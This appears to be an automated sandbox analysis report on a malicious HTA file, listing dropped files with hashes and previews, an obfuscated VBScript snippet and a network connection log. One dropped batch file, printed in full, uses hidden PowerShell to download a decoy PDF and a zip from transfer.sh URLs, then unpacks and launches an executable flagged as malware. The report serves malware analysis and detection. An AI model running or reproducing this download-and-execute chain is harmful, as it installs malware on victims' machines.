                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:ASCII text, with very long lines (393)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):16525
                                                                                                      Entropy (8bit):5.345946398610936
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                                                                      MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                                                                      SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                                                                      SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                                                                                      SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                                                                                      Malicious:false
                                                                                                      Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):15114
                                                                                                      Entropy (8bit):5.356189160284566
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:AoqpSEXMviQ/OH2cPuAsOX26qD3UuufUT24yKoJsGK3xJaKU9uwMBMxU/hFmRJJW:dH
                                                                                                      MD5:78B294AB8A4D0CEB4EF215DE86FB0C28
                                                                                                      SHA1:0D05397BAB3E3180C90DABFAE6B45BB0DE381892
                                                                                                      SHA-256:29C1F409C25ADFF2B2B3FEDE0B6F16ECDFF12607A4375E019A3ADD1B3BC63AB1
                                                                                                      SHA-512:F42DDF2C22DAF8A07AA504091E05B2E22A2C0921956BF98353AC5AEC9C29D8C4018565A03D4D4C769AED14149C8F07183ECF129A26D7C1F4295B70D9603D3F29
                                                                                                      Malicious:false
                                                                                                      Preview:SessionID=883a4fca-6bd3-4d24-86ce-eb057904de0a.1707974883260 Timestamp=2024-02-15T06:28:03:260+0100 ThreadID=8084 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=883a4fca-6bd3-4d24-86ce-eb057904de0a.1707974883260 Timestamp=2024-02-15T06:28:03:261+0100 ThreadID=8084 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=883a4fca-6bd3-4d24-86ce-eb057904de0a.1707974883260 Timestamp=2024-02-15T06:28:03:261+0100 ThreadID=8084 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=883a4fca-6bd3-4d24-86ce-eb057904de0a.1707974883260 Timestamp=2024-02-15T06:28:03:261+0100 ThreadID=8084 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=883a4fca-6bd3-4d24-86ce-eb057904de0a.1707974883260 Timestamp=2024-02-15T06:28:03:261+0100 ThreadID=8084 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):29752
                                                                                                      Entropy (8bit):5.391047630190495
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rM:o
                                                                                                      MD5:68801F2C23433D4BAF22DDB5D96AC9DF
                                                                                                      SHA1:DD5324E9F00493378AEBE04EE19D542A1F0F8B6A
                                                                                                      SHA-256:698E2259A65B87E5FC97BEDE6743680697AD09FC2C8F59FC26EC7A7AE8280DC1
                                                                                                      SHA-512:6E94DD3419B16AA956F2DFEA5FA2A4E91B4F8307ED98BFC7996B7F019AC0761E765887C8EECB1737E76FD935D51D6E66B06C6169067B05C8DBF2ED3A507846D1
                                                                                                      Malicious:false
                                                                                                      Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                      Category:dropped
                                                                                                      Size (bytes):758601
                                                                                                      Entropy (8bit):7.98639316555857
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                                      MD5:3A49135134665364308390AC398006F1
                                                                                                      SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                                      SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                                      SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                                      Malicious:false
                                                                                                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1419751
                                                                                                      Entropy (8bit):7.976496077007677
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:/M7ouWLaGZjZwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:RuWLaGZjZwZGk3mlind9i4ufFXpAXkru
                                                                                                      MD5:AE1E8A5D3E7B2198980A0CA16DE5F3D3
                                                                                                      SHA1:A1DB2C58AFC81E6A114A8EB47BE0243956F79460
                                                                                                      SHA-256:8C2E1B13F6658714D51737D6745FE065B87497923945AB3028706A4171C8328F
                                                                                                      SHA-512:5B36CF0982C5AFED5CCEA4B30A0B31A2B5312FBF5438623D53153E076B59F1B4BEF8C08695EA74E086BCA4EF7221889DB977B5DCFF4C684BA0683FDDECDE2EC4
                                                                                                      Malicious:false
                                                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1407294
                                                                                                      Entropy (8bit):7.97605879016224
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                                                                                                      MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                                                                                                      SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                                                                                                      SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                                                                                                      SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                                                                                                      Malicious:false
                                                                                                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                      Category:dropped
                                                                                                      Size (bytes):386528
                                                                                                      Entropy (8bit):7.9736851559892425
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                      Malicious:false
                                                                                                      Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1009860
                                                                                                      Entropy (8bit):5.1693716718956315
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:XiVjVXCAJkjrEkjdeiaq9vcFCJwty29j89pe15vHXE:SVjVXZJkjr9jdeBhdj89p8vHXE
                                                                                                      MD5:4FA20A5B5049EE4BEE1932E66685F4CD
                                                                                                      SHA1:22AFBB89111E8FE9A448E7474311C0B3BC32C82F
                                                                                                      SHA-256:F91DDC839B91E77D1B53F66324EB4305720D68DC3B332B8249000403E85F890D
                                                                                                      SHA-512:A73E371CFE3C89BB08610FACCB0E1FC9920EFDC10AB044D6CADDBC142D23BCD6AFE6A4363BF4F5D25A392475A928C8EE1E0357F9439EC744A1668E507F141472
                                                                                                      Malicious:true
                                                                                                      Preview:PK..........?X..<.Nh..........msword.com.y|.U.0\.t'......lA....f3-F:..m...F`f.B...B7FAI.,K.e..q...qf..q.f..p..l..QF..].8.@..s.zI............{............pX....\...*...m}.7{|0b.I.`....e..-....{3.....x3.X.Q./...2.n.9..%...NI..(....k...k"....&.JH..Y.O...y. ......5$%.&....S..7.I..*.!#.?."r.w....Y...&L.t...}...t.....^..'%q...I.y2.u.....].~we2.A...wN|F........H.t.H.~..<#.9C..cb.|e../.S.m..........^........U.F}d.k.gJ........~......d..{..w.u..N.f.....8....U6.....ss...Z.{.;.....<.._....Kg......./.2~...1..)........1.+..6.~.=3.._..j.......b..l..&..3mL./9/3...3....z..L...<....3.w.7aN+.i..-...l.?..%uAf..*..\..*..E.._2+.W............M..M.....;x.~XKC.>.z.C}....SL>.r..].s..kZ..j..9O.._.Q.1uE.-w.....d6.<353....?Tf.Y.....c.8\.n'...^...0.Y......u.`.=b..A....c....t.gt....L..-.7.$.^qu2.d).!Y....z.@......>..n87.3..,u.....N..A.......K....bqx.V{..+..1..%...usl...g.}..+.k..}W..dC.s./.]"..N..*.}}......G}p8....9...V...<'...?..jc...u...J...
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):503316480
                                                                                                      Entropy (8bit):0.028716732322548195
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:
                                                                                                      MD5:4CEEDA451C97AB9A9F299CBD8D60CB0F
                                                                                                      SHA1:B9C18D1D8779E5B40CED89DFE1A32FC68AD2E5D6
                                                                                                      SHA-256:9AF78D94F7D31D9C8CA2678341F82946A23778D282BF03100217E98184C4C141
                                                                                                      SHA-512:659F9E08067364E42BE1A47A238B1F48B1D8C9E2178D70E25EECD65FCA71A3A8B6E2D07E84491A8DE3B71FFEFE792187C97FEA3BC8A08C7D44651FCF92F7938E
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      • Antivirus: Virustotal, Detection: 26%, Browse
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."......N....................@..............................`............`... .............................................. ...............................0..6.......................................................H............................text...[L.......N.................. ..`.rdata...*...`...,...T..............@..@.data...............................@....idata....... ......................@....reloc..6....0......................@..B.symtab......P.........................B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):492
                                                                                                      Entropy (8bit):5.170225099056011
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:wiNaEjNEWR081kkGr5aDRNx081kkGVX5OQ981kvYX53RE:wiNaEjNEWSRrYR4RxUkvYX53RE
                                                                                                      MD5:F1C5D954D90DCBDDD1E3EE3B9B66C8AA
                                                                                                      SHA1:C3E6EBA5E1C21EF86E65716D05E72D2E1C9F303E
                                                                                                      SHA-256:D8B74ACEFC48DD6521E79FBDDD2217630E9859D8BB743706380A06A3C8126DA1
                                                                                                      SHA-512:D15C48A8AC9F85BB33E18EC0308D72D699FF6EA8FF421EBFBF9295DBBFE1FE089E8C9C82FF4FB9ABD52F5274C5B0932FA5B9AFFE29C15097F4A5911CD16A6F14
                                                                                                      Malicious:true
                                                                                                      Preview:@echo off..set url=https://transfer.sh/get/WD631pf02G/msword.zip..set url2=https://transfer.sh/get/fHMB2lI9W3/W2.pdf..powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri %url2% -OutFile %temp%\W2.pdf"..cd %temp%..start W2.pdf..powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri %url% -OutFile %temp%\msword.zip"..powershell -WindowStyle Hidden -Command "Expand-Archive -Path %temp%\msword.zip -DestinationPath %temp%\msword -Force"..cd %temp%\msword..start msword.com
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\msword\msword.com
                                                                                                      File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):503316480
                                                                                                      Entropy (8bit):0.028716732322548195
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:
                                                                                                      MD5:4CEEDA451C97AB9A9F299CBD8D60CB0F
                                                                                                      SHA1:B9C18D1D8779E5B40CED89DFE1A32FC68AD2E5D6
                                                                                                      SHA-256:9AF78D94F7D31D9C8CA2678341F82946A23778D282BF03100217E98184C4C141
                                                                                                      SHA-512:659F9E08067364E42BE1A47A238B1F48B1D8C9E2178D70E25EECD65FCA71A3A8B6E2D07E84491A8DE3B71FFEFE792187C97FEA3BC8A08C7D44651FCF92F7938E
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      • Antivirus: Virustotal, Detection: 26%, Browse
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."......N....................@..............................`............`... .............................................. ...............................0..6.......................................................H............................text...[L.......N.................. ..`.rdata...*...`...,...T..............@..@.data...............................@....idata....... ......................@....reloc..6....0......................@..B.symtab......P.........................B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):55
                                                                                                      Entropy (8bit):4.306461250274409
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                      Malicious:false
                                                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                      File type:HTML document, ASCII text, with very long lines (9688), with CRLF line terminators
                                                                                                      Entropy (8bit):3.5017155125261863
                                                                                                      TrID:
                                                                                                      • Visual Basic Script (13500/0) 100.00%
                                                                                                      File name:p5.hta
                                                                                                      File size:10'664 bytes
                                                                                                      MD5:eb6489f441255d5bc92e640f83fca56d
                                                                                                      SHA1:6cc24139db203cf43bb89d532733a429d5935354
                                                                                                      SHA256:f5d43238d7de76e26d0b78baa64291caec02f09ccaa5842a23f02ab69606d366
                                                                                                      SHA512:357da5098b909783fc4fee766c8721a6c196ad84a005f2e0626c20649e1f4742caac7969e72e218136eee43fe22efe3ce31e044999af50c865b10b3b9c6e201a
                                                                                                      SSDEEP:192:9rn7OUOy/62kfWETXnxOOdNxpmPv0Lj6APWj6IMeIrE1BeewpcAVs:9bqs
                                                                                                      TLSH:32222A80547BF6B677E1188552369B4439F4200FADE4BEE93961DA9CF8423C329BB4D2
                                                                                                      File Content Preview:<head>..<script language="vBsCRIPT">................Function pZUC(ByVal HFwod).. Dim UUyEWVH.. Dim xQihrydG.. xQihrydG = 47345.. Dim TRYIVplDlCa.. TRYIVplDlCa = PmjnQ(HFwod).. If TRYIVplDlCa = 7000 + 1204 Then.. For Each UUyEWVH In H
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Feb 15, 2024 06:27:55.115581036 CET49729443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:55.115662098 CET44349729144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:55.115752935 CET49729443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:55.125910997 CET49729443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:55.125989914 CET44349729144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:55.559206963 CET44349729144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:55.559364080 CET49729443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:55.561866045 CET49729443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:55.561917067 CET44349729144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:55.562356949 CET44349729144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:55.580401897 CET49729443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:55.621974945 CET44349729144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:56.012232065 CET44349729144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:56.012453079 CET44349729144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:56.012557030 CET49729443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:56.016484022 CET49729443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:57.154556036 CET49730443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:57.154643059 CET44349730144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:57.154742956 CET49730443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:57.160429001 CET49730443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:57.160510063 CET44349730144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:57.589530945 CET44349730144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:57.589632034 CET49730443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:57.591744900 CET49730443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:57.591777086 CET44349730144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:57.592143059 CET44349730144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:57.604198933 CET49730443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:57.645979881 CET44349730144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:58.061456919 CET44349730144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:58.061574936 CET44349730144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:58.061781883 CET49730443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:58.061804056 CET44349730144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:58.061845064 CET44349730144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:58.061912060 CET49730443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:58.107907057 CET49730443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:58.271970034 CET44349730144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:58.272008896 CET44349730144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:58.272170067 CET49730443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:58.272170067 CET49730443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:58.272224903 CET44349730144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:58.272289038 CET49730443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:58.272320986 CET44349730144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:58.272372961 CET44349730144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:58.272419930 CET49730443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:58.272419930 CET49730443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:58.272456884 CET44349730144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:58.272526979 CET49730443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:58.272543907 CET44349730144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:58.326658010 CET49730443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:58.481769085 CET44349730144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:58.481803894 CET44349730144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:58.481961012 CET44349730144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:58.481961966 CET49730443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:58.482027054 CET49730443192.168.2.4144.76.136.153
                                                                                                      Feb 15, 2024 06:27:58.482054949 CET44349730144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:58.482144117 CET44349730144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:58.482201099 CET44349730144.76.136.153192.168.2.4
                                                                                                      Feb 15, 2024 06:27:58.482270002 CET44349730144.76.136.153192.168.2.4
